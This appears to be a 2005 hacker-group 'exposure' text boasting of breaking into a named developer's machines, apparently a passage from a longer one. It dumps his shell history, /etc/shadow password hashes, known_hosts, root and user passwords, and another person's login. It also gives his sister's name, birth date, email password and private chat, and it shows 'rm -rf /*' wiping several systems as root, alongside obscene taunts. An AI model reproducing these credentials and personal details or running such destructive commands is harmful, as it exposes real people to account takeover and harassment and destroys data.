365 -nodes -out stunnel.pem -keyout stunnel.pem ls cp stunnel.pem server.pem ls ls -l rm ca.key touch ca.key cd /tmp apt-get source wzdftpd ls cd wzdftpd-0.5.2 ls cd src ls cd ../.. cp -r wzdftpd-0.5.2 ~rave exit apt-get install proftpd apt-get install proftpd ftp localhost killall inetd inetd ftp localhost /etc/init.d/proftpd /etc/init.d/proftpd start ftp localhost telnet localhost ftp telnet localhost ftp exit apt-get install vsftpd telnet localhost ftp exit pico /etc/vsftpd.conf ls /etc/ssl ls /etc/ssl/certs ftp localhost pico /etc/vsftpd.conf ls /etc/ | grep ftp cat /etc/inetd.conf cat /etc/inetd.conf | grep ftp cd /etc/init.d ls pico vsftpd vsftpd --help vsftpd -help man vsftpd man vsftpd.conf pico /etc/vsftpd.conf ./vsftpd restart ./vsftpd stop ./vsftpd start ftp localhost ftp localhost ftp localhost pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start ftp localhost pico /etc/vsftpd.conf man vsftpd.conf pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start ftp localhost ./vsftpd start ftp localhost pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start pico /etc/vsftpd.conf telnet localhost ftp ./vsftpd start ps aux | grep vsftpd ./vsftpd stop ./vsftpd help ./vsftpd reload ./vsftpd start ./vsftpd reload pico /etc/vsftpd.conf ls /etc/ssl/certs pico /etc/vsftpd.conf ./vsftpd reload ./vsftpd start ftp localhost pico /etc/vsftpd.conf ./vsftpd start ls ls /var/log ls /var/log/vs* ls /var/log/vsftpd.log cat /var/log/vsftpd.log exit cat /var/log/vsftpd.log cat /var/log/vsftpd.log cd /etc/ssl/certs/ ls ls /etc/eftpdssl cp ftpd.pem /etc/eftpdssl/server.pem cat /var/log/vsftpd.log ls cat f46db652.0 cp f46db652.0 /etc/eftpdssl/ca.key ftp localhost 1032 ls ls /etc/eftpdssl/ ls /etc/eftpdssl/ca.key ftp localhost ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 -d ftp -d localhost 1033 ftp -d localhost ftp -d localhost ftp -d localhost 1033 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1033 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 pico msg.c ftp -d localhost 1032 pico msg.c ftp -d localhost 1032 ltrace ftp -d localhost 1032 ltrace ftp -d localhost 1032 t reset ltrace ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 exit make install ls /etc/extreme ls /etc/extreme/ rm /etc/extreme/ rm /etc/extreme pico Makefile.am make install ls /etc/extreme pico Makefile.am ls /etc/extreme make install ls /etc/extreme pico Makefile.am make install pico Makefile.am make install ls /etc/extreme ls /etc/extreme -; ls /etc/extreme -l rm -r /etc/extreme telnet localhost ftp cat conf/ftpd cat conf/ftpd.conf cat ftpd.conf pico ftpd.conf ls exit pico /etc/vsftpd.conf mkdir /var/run/vsftpd chmod 777 /var/run/vsftpd exit pico /etc/vsftpd.conf killall inetd inetd exit /etc/init.d/vsftpd restart /etc/init.d/vsftpd stop /etc/init.d/vsftpd start exit apt-get install kasablanca_0.3.1-1_i386.deb apt-get install kasablanca_0.3.1-1_i386.deb dpkg install kasablanca_0.3.1-1_i386.deb dpkg-install kasablanca_0.3.1-1_i386.deb dpkg -i kasablanca_0.3.1-1_i386.deb exit rm Makefile exit make install ls ls /etc/extreme exit make install ls -l /etc/extreme/ssl make clean exit make isntall make install ls /etc/extreme make uninstall ls /etc/extreme cd ../ssl make unistall ls pico Makefile make uninstall pico Makefile cd .. exit make uninstall ls /etc/extreme/ssl make install make ls /etc/extreme/ssl make install ls /etc/extreme/ssl make uninstall ls /etc/extreme/ssl ls -l make clean ls -l exit cd .. make install make install-am cd src make install make uninstall ls exit make install make make install exit make install exit cd ../ssl cd ssl make clean ls exit make install exit make install ls /etc/extreme ls /etc/extreme/ssl exit ls cd ~extreme/modules cd ~rave/extreme/modules make install ls make install make install ls /lib/extreme ftp localhost ftp localhost 1032 cd .. make install ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 exit make encpem make install make clean exit make make install exit make ls cd .. ls cd debian ls pico Makefile make dist ls ls *.deb ls -l ls -l | grep dr ls make ls cd .. ls cd utils ls make cd .. ls more README pico Makefile make deb apt-get install cdbs make deb ls cd debian ls ls *.deb cd tmp ls ls uname -n exit debian:~# cat .ssh/known_hosts 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= rootme.dyndns.org,67.81.132.213 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0LKrRLg4+fkEEWndXBFsLwTlla4HkMURl59gmY4tW3YTxZntPJ+Z3Z6fJjm2gVjkTMQFyQ7hoUBpkBeHhP0EZH7gqCkd5OG51OYazgEVtszjnQjKXUiu/rhb/a7MzFF2Hk2o2xQWhFiJbZyoT6v3kqcBsybre/TD9d29fGbqCK8= ::1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k= localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k= debian:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false rave:x:1000:1000:Johnny Mast,,,:/home/rave:/bin/bash postgres:x:100:103:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash identd:x:101:65534::/var/run/identd:/bin/false messagebus:x:103:104::/var/run/dbus:/bin/false hal:x:106:106:Hardware abstraction layer,,,:/var/run/hal:/bin/false sshd:x:104:65534::/var/run/sshd:/bin/false saned:x:110:110::/home/saned:/bin/false gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false ftp:x:107:65534::/home/ftp:/bin/false mysql:x:108:112:MySQL Server,,,:/var/lib/mysql:/bin/false debian:~# cat /etc/shadow root:$1$H/m5k.O/$fZ.JlzRLK4ETSGi3OHJ601:12995:0:99999:7::: daemon:*:12995:0:99999:7::: bin:*:12995:0:99999:7::: sys:*:12995:0:99999:7::: sync:*:12995:0:99999:7::: games:*:12995:0:99999:7::: man:*:12995:0:99999:7::: lp:*:12995:0:99999:7::: mail:*:12995:0:99999:7::: news:*:12995:0:99999:7::: uucp:*:12995:0:99999:7::: proxy:*:12995:0:99999:7::: www-data:*:12995:0:99999:7::: backup:*:12995:0:99999:7::: list:*:12995:0:99999:7::: irc:*:12995:0:99999:7::: gnats:*:12995:0:99999:7::: nobody:*:12995:0:99999:7::: Debian-exim:!:12995:0:99999:7::: rave:$1$xINGrGHI$j34Ir9hbe5EsU.g15FY9n.:12995:0:99999:7::: postgres:!:12995:0:99999:7::: identd:!:12995:0:99999:7::: messagebus:!:12995:0:99999:7::: hal:!:12995:0:99999:7::: sshd:!:12995:0:99999:7::: saned:!:12995:0:99999:7::: gdm:!:12995:0:99999:7::: ftp:!:13001:0:99999:7::: mysql:!:13003:0:99999:7::: debian:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1504 512 ? S 17:06 0:00 init [2] root 2 0.0 0.0 0 0 ? SN 17:06 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? S< 17:06 0:00 [events/0] root 4 0.0 0.0 0 0 ? S< 17:06 0:00 [khelper] root 5 0.0 0.0 0 0 ? S< 17:06 0:00 [kacpid] root 41 0.0 0.0 0 0 ? S< 17:06 0:00 [kblockd/0] root 51 0.0 0.0 0 0 ? S 17:06 0:00 [pdflush] root 52 0.0 0.0 0 0 ? S 17:06 0:00 [pdflush] root 54 0.0 0.0 0 0 ? S< 17:06 0:00 [aio/0] root 53 0.0 0.0 0 0 ? S 17:06 0:00 [kswapd0] root 196 0.0 0.0 0 0 ? S 17:06 0:00 [kseriod] root 217 0.0 0.0 0 0 ? S< 17:06 0:00 [ata/0] root 302 0.0 0.0 0 0 ? S 17:06 0:00 [kjournald] root 351 0.0 0.0 1492 468 ? S rave 4347 0.0 1.7 62644 9028 ? Sl 17:09 0:00 /usr/lib/evolution/2.2/evolution-alarm-notify --oaf-activate-iid=OAFIID:GNOME_Evolution_Calendar_AlarmNotify_Factory:2.2 --oaf-ior-fd=47 rave 4374 0.5 8.6 51996 44660 ? S 17:10 1:43 gedit file:///home/rave/Desktop/TODO rave 4380 0.0 5.1 65416 26476 ? Sl 17:10 0:18 kopete rave 4382 0.0 1.8 22364 9320 ? Ss 17:10 0:00 kdeinit Running... rave 4386 0.0 1.6 22044 8776 ? S 17:10 0:00 kdeinit: dcopserver --nosid --suicide rave 4388 0.0 1.8 23700 9624 ? S 17:10 0:00 kdeinit: klauncher rave 4390 0.0 2.2 25500 11764 ? S 17:10 0:01 kdeinit: kded rave 4398 0.1 7.1 115428 36820 ? Sl 17:10 0:26 /usr/lib/mozilla-firefox/firefox-bin -a firefox rave 4425 0.0 2.6 29948 13784 ? S 17:10 0:00 kdeinit: knotify rave 4520 0.5 3.0 28256 15836 ? S 17:16 1:51 konsole rave 4521 0.0 0.3 3116 1764 pts/0 Ss+ 17:17 0:00 /bin/bash rave 4531 0.0 0.3 3188 1832 pts/1 Ss+ 17:17 0:00 /bin/bash root 16032 0.0 0.1 2340 916 pts/3 Ss 18:53 0:00 su - root 16033 0.0 0.2 2684 1524 pts/3 S+ 18:53 0:00 -su root 16062 0.0 0.2 3372 1452 ? Ss 18:54 0:00 /usr/sbin/sshd rave 21768 0.0 0.3 3080 1728 ? S 20:37 0:00 ispell -a -S -C rave 22890 0.0 1.6 18596 8500 ? S 20:57 0:00 /usr/lib/nautilus/nautilus-throbber --oaf-activate-iid=OAFIID:Nautilus_Throbber_Factory --oaf-ior-fd=51 root 24173 0.0 0.3 6052 1764 ? Ss 22:25 0:00 sshd: rave [priv] rave 24178 0.0 0.3 6200 1848 ? S 22:25 0:00 sshd: rave@pts/2 rave 24179 0.0 0.3 2760 1612 pts/2 Ss 22:25 0:00 -bash root 24363 0.0 0.1 2056 876 pts/2 S 22:37 0:00 su - root 24368 0.0 0.2 2700 1536 pts/2 S 22:37 0:00 -su root 24436 0.0 0.1 2496 856 pts/2 R+ 22:41 0:00 ps aux [4] localhost.localdomain (192.168.0.10) owned & exposed debian:/var/www# ssh 192.168.0.10 -l rave Password: Last login: Mon Aug 15 00:23:26 2005 from 192.168.0.6 rave@debian:~$ uname -a; id Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=1000(rave) gid=1000(rave) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(rave) rave@debian:~$ echo "Once again.. DEBIAN" Once again.. DEBIAN rave@debian:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 1504 512 ? S Aug14 0:00 init [5] root 2 0.0 0.0 0 0 ? SN Aug14 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? S< Aug14 1:01 [events/0] root 4 0.0 0.0 0 0 ? S< Aug14 0:00 [khelper] root 23 0.0 0.0 0 0 ? S< Aug14 0:00 [kblockd/0] root 45 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush] root 46 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush] root 48 0.0 0.0 0 0 ? S< Aug14 0:00 [aio/0] root 47 0.0 0.0 0 0 ? S Aug14 0:01 [kswapd0] root 190 0.0 0.0 0 0 ? S Aug14 0:00 [kseriod] root 211 0.0 0.0 0 0 ? S< Aug14 0:00 [ata/0] root 296 0.0 0.0 0 0 ? S Aug14 0:00 [kjournald] root 332 0.0 0.2 1492 460 ? S~<| | | /'\| |/'\.. /~\| | | | \ | =[@]= | | \ | | | | | \ | ~ ~ ~ ~ |` ) | / \ / \ / \ _____ / |--//''`\--| | (( +==)) | |--\_|_//--| [Welcome to] *~> Rosiello FTPD <~* code by: Johnny mast modded by: dikline email: rave@rosiello.org Thank you for choosing to rm -rf /* with us. figure out the rest.. [8] raves master planes to own dikline rave info about decline: they run debian 3.0 <-- w0ah, nmap skills! Darkeagle yes <-- actually FBSD... rave you can own them ur self <-- really ? rave take a proxy rave and join under a diff nick #decline <-- you figured that out by yourself? rave @ gotphracked.com <-- uhm.. dikline.com rave then stay there realy long <-- /kick rave make up a project where you need root for <-- Yes! Hello stranger! here is the root pass for dk.com rave make you have root for more then 6+ monts <-- uhm.. didnt understand that rave and then out of the blue own them <-- :( rave thats what i do <-- Im impressed! rave with my enamy`s <-- your dad beat you up ? w0aaahh!! Shit... we are in big trouble.. please rave dont own us with your 1337 social skills :( [9] raves 1337 tips to Internet hacking! rave an other fake " im so friendly joined #rosiello" rave just play stupid <-- Play ? rave is the hacker who is smart <-- yes grasshopper.. rave now im the hacker !! <-- when did you become a hacker? rave make him feel like in charge rave then own him <-- what is the world coming to?! :( rave its as easy as that <-- If you say so rave thats the secret <-- nice secret rave remember play the fool !! <-- like you ? rave rosiello is smart <-- No doubt rave i just play stupid <-- you just "play" stupid rave just play stupid <-- Havent you said that enough now ? rave that the lesson rosiello learned <-- So you guys PRETEND that you are stupid? rave we are NOT stupid <-- OK OK OK OK OK I GET IT YOU ARE NOT STUPID rave it was boobys who fucked us rave we owned them <-- Just like we owned you ? rave just because whe could controle our selfs <-- Lets see how controled you will be when I rm -rf / rave you need to learn to controle ur self to engeneer ur attackers rave since these ppl are kids <-- Then I guess you got owned by kids rave and even more then boobys is/was rave we aint stupid <-- Havent you said that enough ? rave every nick has been googled for <-- Thats alot of googling. rave the account to boobys :D <-- Which you sucked alot of dick for rave private:mecyme :D rave thats how i got in <-- I can still feel the taste of cum in my mouth rave its the brain Darky <-- And alot of dick sucking rave got.phracked should not never be a problem <-- we just owned your ass and its DIKLINE now. And it goes on and on about how rosiello aint stupid... You can download all of raves irclogs at: http://oral-sex.bz/~gotraved/xchatlogs.tar.gz If you look hard enough you will even find shit like: Jun 19 17:42:09 Darkeagle h: darkeagle.linkin-park.cc Jun 19 17:42:12 Darkeagle u: rave Jun 19 17:42:17 Darkeagle p: raverocks Jun 19 17:42:19 Darkeagle port:22 Jun 19 17:42:27 Darkeagle keep it <-- I will Thanks to |silent for hosting =) [10] raves 1337 passwords When you are giving out 1337 hacking tips to your friends, running a maaajor ftp developement and.. just dicking around.... its good to chose good passwords! ssh www.rosiello.net -l root password: supp3rmaninspace rave pass: godsmack ssh 192.168.0.6 -l root password: supp3rmaninspace rave pass: A390kb ssh 192.168.0.10 -l root password: supp3rman Let me guess.. Fave childhood superhero is superman ? [11] raves sister gets owned & exposed First Name : amanda Last Name : mast Birth date : 27 December 1987 Country : Netherlands email : mastamanda@hotmail.com Password : iloveyou logging into mastamanda@hotmail.com... Conversation with plurk01@hotmail.com at 2005-08-18 23:01:59 on mastamanda@hotmail.com (msn) (23:01:59) Trashed and scattered again, I'm feelin' so low!: dat is al weer snel :) (23:02:18) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: :) <-- lol nice nick raves sister! (23:02:21) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: Ich bin geil .. <-- I am horny (I think?) (23:03:13) Trashed and scattered again, I'm feelin' so low!: ooow (23:03:17) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: ;) (23:03:19) Trashed and scattered again, I'm feelin' so low!: hoe komt dat zo ? :P <-- translation ? (23:03:39) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: I brake up... (23:03:54) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: I love sn1ffle (23:04:03) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: and dikline so much .. Im sorry (23:04:31) Trashed and scattered again, I'm feelin' so low!: wtf nu even nederlands (23:04:36) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: ja (23:04:47) Trashed and scattered again, I'm feelin' so low!: ik wil ? :P uhm... *close conversation window* I guess I should have payed better attention In class ? New MSN password: Superm4n5678 [12] the rm -rf /* Well. we have had our fun, defaced rosiello.org, changed eftp, got everything we wanted from rave. Now its my for the thing that you have all been waiting for! THE RM -RF /* Raves laptop gets rm -rf /* : debian:/home# ssh 192.168.0.6 The authenticity of host '192.168.0.6 (192.168.0.6)' can't be established. RSA key fingerprint is 16:c2:70:b2:0f:4c:52:b4:9f:fa:2c:39:64:8c:72:75. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.0.6' (RSA) to the list of known hosts. Password: Last login: Sat Aug 13 20:56:12 2005 debian:~# rm -rf /* rm: cannot remove directory `/dev/shm': Device or resource busy rm: cannot remove `/dev/pts/0': Operation not permitted rm: cannot remove directory `/dev/.static/dev': Device or resource busy debian:~# ls -bash: ls: command not found Rosiello.net gets rm -rf /* : debian:/home# uname -a; id Linux debian.rosiello.net 2.4.27-2-386 #1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) debian:/home# rm -rf /* rm: cannot remove `/dev/pts/5': Operation not permitted rm: cannot remove `/dev/pts/6': Operation not permitted rm: cannot remove directory `/dev/shm': Device or resource busy debian:/home# ls -bash: /bin/ls: No such file or directory debian:/home# uname -a -bash: /bin/uname: No such file or directory And this other box gets rm -rf /* : debian:/var/www# ssh 192.168.0.10 Password: Last login: Wed Aug 17 18:15:09 2005 from 192.168.0.6 debian:~# uname -a; id Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) debian:~# echo "BYE RAVE" BYE RAVE debian:~# rm -rf /* rm: cannot remove directory `/dev/shm': Device or resource busy rm: cannot remove `/dev/pts/0': Operation not permitted rm: cannot remove directory `/dev/.static/dev': Device or resource busy rm: cannot remove `/proc/asound/pcm': Operation not permitted rm: cannot remove `/proc/asound/timers': Operation not permitted rm: cannot remove `/proc/asound/modules': Operation not permitted rm: cannot remove `/proc/asound/cards': Operation not permitted rm: cannot remove `/proc/asound/devices': Operation not permitted rm: cannot remove `/proc/asound/version': Operation not permitted rm: cannot remove `/proc/asound/seq/drivers': Operation not permitted rm: cannot remove `/proc/asound/oss/sndstat': Operation not permitted rm: cannot remove `/proc/asound/oss/devices': Operation not permitted rm: `/proc/ide/hdc' changed dev/ino: Operation not permitted debian:~# ls -bash: /bin/ls: No such file or directory debian:~# w -bash: w: command not found debian:~# uname -a -bash: /bin/uname: No such file or directory [13] Conclusion 11:14 -!- Irssi: Looking up irc.rosiello.net 11:14 -!- Irssi: Connecting to irc.rosiello.net [212.127.146.168] port 6667 11:14 -!- Irssi: Connection to irc.rosiello.net established 11:14 !irc.rosiello.net *** Looking up your hostname... 11:14 !irc.rosiello.net *** Found your hostname 11:14 !irc.rosiello.net *** If you are having problems connecting due to ping timeouts, please type /quote pong 81725818 or /raw pong 81725818 now. 11:14 -!- Welcome to the rosiello security network (RSN) IRC Network g0g0_!n0@dikline.com 11:14 -!- Your host is irc.rosiello.net, running version Unreal3.2.3 11:14 -!- This server was created Wed Jul 27 2005 at 17:09:52 GMT 11:14 -!- irc.rosiello.net Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj 11:14 -!- SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 are supported by this server 11:14 -!- SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=rosiello-security-network-(RSN) CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server 11:14 -!- There are 24 users and 78 invisible on 8 servers 11:14 -!- 15 operator(s) online 11:14 -!- 40 channels formed 11:14 -!- I have 5 clients and 2 servers 11:14 -!- Current Local Users: 5 Max: 17 11:14 -!- Current Global Users: 102 Max: 124 11:14 -!- - irc.rosiello.net Message of the Day - 11:14 -!- - 19/8/2005 16:02 11:14 -!- - ***** ** ***** 11:14 -!- - ****** *** ****** 11:14 -!- - ** * * *** ** * * ** ~Welcome to another HI-Jacked IRCD. 11:14 -!- - * * * *** * * * **** * W-E L-O-V-E R-A-V-E 11:14 -!- - * * *** * * **** 11:14 -!- - ** ** ** ** ** * ** 11:14 -!- - ** ** ** ** ** * You're admin's for the day: 11:14 -!- - ** ** ** ** ***** 11:14 -!- - ** ** ** ** ** *** 11:14 -!- - ** ** ** ** ** *** // fmrj@dikline.com 11:14 -!- - * ** ** * ** *** // g0g0@dikline.com 11:14 -!- - * * * *** 11:14 -!- - ***** * **** *** 11:14 -!- - * ********* * ***** *** * ..DO YOU FEEL SAFE YET? 11:14 -!- - * **** * *** *** 11:14 -!- - * * 11:14 -!- - ** ** 11:14 -!- - 11:14 -!- - ... Blend in. - Get trusted - Trust no-one. - Own everyone. 11:14 -!- - ... Disclose nothing. - Destroy everything. - Take back the scene. 11:14 -!- - 11:14 -!- - For the full rosiello exposure, please visit: 11:14 -!- - 11:14 -!- - [ WWW.DIKLINE.COM ] 11:14 -!- - 11:14 -!- End of /MOTD command. 11:14 -!- Mode change [+iwx] for user g0g0_ 11:14 -!- Irssi: Your nick is owned by g0g0 [g0g0@rosielloBl4Ckb0x-72D69544.idstelcom.net] 11:14 -!- You're now known as fmrj 11:14 -!- Mode change [+oghaAsNt] for user fmrj 11:14 -!- Server notice mask (+kcfvGqso) 11:14 -!- You are now an IRC Operator 11:14 !irc.rosiello.net *** Global -- from OperServ: fmrj is now an IRC operator. 11:15 !irc.rosiello.net *** Notice -- Client connecting on port 6697: nanonyme (nanonyme@cm-84.210.197.006.chello.no) [clients] [secure AES256-SHA] YOU ARE ALL SNIFFED, LOGGED, MONITORED & OWNED RAVE IS A FUCKING 12 YEAR OLD WITH A BIG MOUTH, DO US ALL A FAVOUR AND SHUT THE FUCK UP 18:44 < jmos45> we should own their site.. -> you wait until n0tm3! also, if rave could email me and say something like "Sorry for all bullshit ive called you guys" that would be nice! - contact: flsh@dikline.com